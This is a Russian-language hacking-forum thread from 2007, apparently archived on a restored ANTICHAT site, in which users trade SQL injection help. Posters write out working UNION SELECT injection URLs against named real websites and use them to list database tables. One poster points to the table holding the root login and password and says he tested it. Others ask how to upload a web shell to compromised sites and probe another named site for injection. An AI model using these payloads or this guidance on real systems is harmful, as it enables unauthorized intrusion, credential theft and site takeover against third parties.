ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
02.10.2007, 12:16
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
тут на ачате полно статей о скулях и о лоад_файл
http://forum.antichat.ru/thread19844.html
http://forum.antichat.ru/showthread.php?p=407222#post407222
еще тут
http://injection.rulezz.ru/
а вообще поиск)))
|
|
|
02.10.2007, 16:38
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Сообщение от phol1eadeux
А что тут непонятного. Главное знать какой файл открывать. При фильтрации ковычек кодируешь строку
добавлю, кодировать можно тут -> _http://h4k.in/encoding/index.php вставляешь нужный текст, выбираешь способ кодирования, например, to SQL HEX()
|
|
|
|
07.10.2007, 11:29
|
|
Новичок
Регистрация: 23.02.2007
Сообщений: 6
Провел на форуме:
45974
Репутация:
1
|
|
Подскажите что делать дальше
_http://snowproject.ru/dj_details.php?did=-1+union+select+1,2,3,4,5,6,7/*
Читал мануалы, но немогу угадать название базы.
|
|
|
|
07.10.2007, 11:55
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Вначале определяем версию.
http://snowproject.ru/dj_details.php?did=-1+union+select+1,2,3,version(),5,6,7/*
Ура 5 мускул!
Дальше проще....
http://snowproject.ru/dj_details.php?did=-1+union+select+1,2,3,table_name,5,6,7%20from%20inf ormation_schema.tables%20limit%200,1/*
limit 1,1 , limit 2,1 ... и т.д.
Исследуем структуру базы.... дальше по обстоятельствам.
|
|
|
|
07.10.2007, 12:47
|
|
Новичок
Регистрация: 23.02.2007
Сообщений: 6
Провел на форуме:
45974
Репутация:
1
|
|
Мэн поясни поподробней плиз, что теперь мне это даёт и как сформировать запрос на user  ass.
0 - CHARACTER_SETS
1 - COLLATIONS
3 - COLUMNS
4 - COLUMN_PRIVILEGES
5 - KEY_COLUMN_USAGE
6 - PROFILING
7 - ROUTINES
8 - SCHEMATA
9 - SCHEMA_PRIVILEGES
10 - STATISTICS
11 - TABLES
12 - TABLE_CONSTRAINTS
13 - TABLE_PRIVILEGES
14 - TRIGGERS
15 - USER_PRIVILEGES
16 - VIEWS
17 - banners
18 - contacts
19 - djs
20 - gen_sets |
|
|
|
07.10.2007, 13:12
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Все лежит в таблице gen_sets тама есть нужные тебе поля login и password
нужный тебе юзер в данном случае - root
пароль - найди сам  , а то ведь так не интересно. И еще тебе нужно найти куда это подставить.
З.Ы. Я нашел и проверил. Работает.
З.З.Ы. И еще.... почитай мануалы внимательней, а то ты писал что читаешь....
Последний раз редактировалось Red_Red1; 07.10.2007 в 13:19..
|
|
|
|
07.10.2007, 19:36
|
|
Новичок
Регистрация: 23.02.2007
Сообщений: 6
Провел на форуме:
45974
Репутация:
1
|
|
То Red_Red1 - Респект, спасибо!
|
|
|
|
09.10.2007, 22:28
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 160
Провел на форуме:
619440
Репутация:
96
|
|
есть жоступ к админке, но могу только добавлять новости\статьи. при этом ничего не фильтруется. можно как-нибудь залить шелл?
|
|
|
|
10.10.2007, 00:22
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Ну ты б поподробнее описал все: мож эта известная цмска, есть ли возможность заливать картинки или прекреплять файлы и т.д.
__________________
Карфаген должен быть разрушен...
|
|
|
|
13.10.2007, 08:03
|
|
Новичок
Регистрация: 31.03.2007
Сообщений: 22
Провел на форуме:
85992
Репутация:
-1
|
|
http://www.0629.com.ua/view_news.php?id_news=
Прописываю: http://www.0629.com.ua/view_news.php?id_news=http://mail.ru
Пишет: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://mail.ru' at line 1
Можно ли как нибудь загрузить шелл?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
